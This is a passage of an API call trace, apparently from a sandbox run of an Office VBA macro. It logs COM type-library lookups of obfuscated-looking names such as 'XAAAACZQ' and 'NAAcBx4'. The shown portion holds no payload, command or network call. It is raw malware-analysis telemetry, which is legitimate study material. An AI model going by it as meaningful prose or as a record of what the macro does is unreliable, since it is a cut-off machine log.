pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.213] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XAAAACZQ") returned 0x108346 [0069.213] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="XAAAACZQ" | out: _Dst="XAAAACZQ") returned 0x0 [0069.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="XAAAACZQ") returned 9 [0069.213] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.213] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XAAAACZQ", lHashVal=0x108346, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.213] IUnknown:Release (This=0x665ba50) returned 0xd [0069.213] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.213] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XAAAACZQ", lHashVal=0x108346, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.213] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.213] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.213] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XAAAACZQ", lHashVal=0x108346, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.213] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.213] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.213] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XAAAACZQ", lHashVal=0x108346, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.213] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ca2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="XAAAACZQ") returned 9 [0069.213] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XAAAACZQ", lHashVal=0x108346, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.214] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.214] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62ca2 | out: _Dst=0x67c2d40) returned 0x0 [0069.214] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XAAAACZQ") returned 0x105acf [0069.214] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_XAAAACZQ" | out: _Dst="_B_var_XAAAACZQ") returned 0x0 [0069.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_XAAAACZQ") returned 16 [0069.214] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.214] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XAAAACZQ", lHashVal=0x105acf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.214] IUnknown:Release (This=0x665ba50) returned 0xd [0069.214] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.214] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XAAAACZQ", lHashVal=0x105acf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.214] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.214] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.214] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XAAAACZQ", lHashVal=0x105acf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.214] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.214] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.214] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XAAAACZQ", lHashVal=0x105acf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.214] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.214] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.214] IUnknown:Release (This=0x665ba50) returned 0xd [0069.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11aee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_XAAAACZQ") returned 16 [0069.214] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XAAAACZQ", lHashVal=0x105acf, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.214] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62ca2 | out: _Dst=0x144ec0) returned 0x0 [0069.214] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NAAcBx4", lHashVal=0x104cc5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62cce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NAAcBx4") returned 8 [0069.214] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NAAcBx4", lHashVal=0x104cc5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62cce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NAAcBx4") returned 8 [0069.215] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NAAcBx4", lHashVal=0x104cc5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAAcBx4") returned 0x104cc5 [0069.215] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="NAAcBx4" | out: _Dst="NAAcBx4") returned 0x0 [0069.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="NAAcBx4") returned 8 [0069.215] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.215] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NAAcBx4", lHashVal=0x104cc5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.215] IUnknown:Release (This=0x665ba50) returned 0xd [0069.215] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.215] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NAAcBx4", lHashVal=0x104cc5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.215] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.215] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.215] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NAAcBx4", lHashVal=0x104cc5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.215] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.215] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.215] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NAAcBx4", lHashVal=0x104cc5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.215] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62cce, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="NAAcBx4") returned 8 [0069.215] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NAAcBx4", lHashVal=0x104cc5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.215] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.215] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62cce | out: _Dst=0x67c2d40) returned 0x0 [0069.215] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NAAcBx4") returned 0x105049 [0069.215] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_NAAcBx4" | out: _Dst="_B_var_NAAcBx4") returned 0x0 [0069.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_NAAcBx4") returned 15 [0069.215] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.216] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NAAcBx4", lHashVal=0x105049, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.216] IUnknown:Release (This=0x665ba50) returned 0xd [0069.216] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.216] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NAAcBx4", lHashVal=0x105049, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.216] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.216] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.216] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NAAcBx4", lHashVal=0x105049, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.216] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.216] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.216] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NAAcBx4", lHashVal=0x105049, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.216] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.216] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.216] IUnknown:Release (This=0x665ba50) returned 0xd [0069.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11b1e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_NAAcBx4") returned 15 [0069.216] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NAAcBx4", lHashVal=0x105049, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x42006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4e005f00720061, ppTypeComp=0x42006300000000, pDummy=0x0) returned 0x0 [0069.216] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62cce | out: _Dst=0x144ec0) returned 0x0 [0069.216] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.216] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.216] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.216] IUnknown:Release (This=0x665ba50) returned 0xd [0069.216] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.216] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.216] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.216] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.216] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.216] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.217] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.217] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.217] IUnknown:Release (This=0x665ba50) returned 0xd [0069.217] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.217] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.217] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.217] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.217] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.217] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.217] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.217] IUnknown:Release (This=0x665ba50) returned 0xd [0069.217] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.217] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.217] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.217] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.217] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.217] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.217] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.217] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.217] IUnknown:Release (This=0x665ba50) returned 0xd [0069.217] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.218] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.218] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.218] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.218] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.218] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.218] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.218] IUnknown:Release (This=0x665ba50) returned 0xd [0069.218] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.218] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.218] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.218] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.218] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.218] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.218] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.218] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.218] IUnknown:Release (This=0x665ba50) returned 0xd [0069.218] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.218] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.218] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.218] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.218] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.218] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.218] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.218] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.219] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.219] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.219] IUnknown:Release (This=0x665ba50) returned 0xd [0069.219] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.219] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.219] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.219] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.219] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.219] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.219] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.219] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.219] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.219] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.219] IUnknown:Release (This=0x665ba50) returned 0xd [0069.219] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.219] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.219] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62c26, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="bCAocAD") returned 8 [0069.220] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bCAocAD", lHashVal=0x10d2e4, 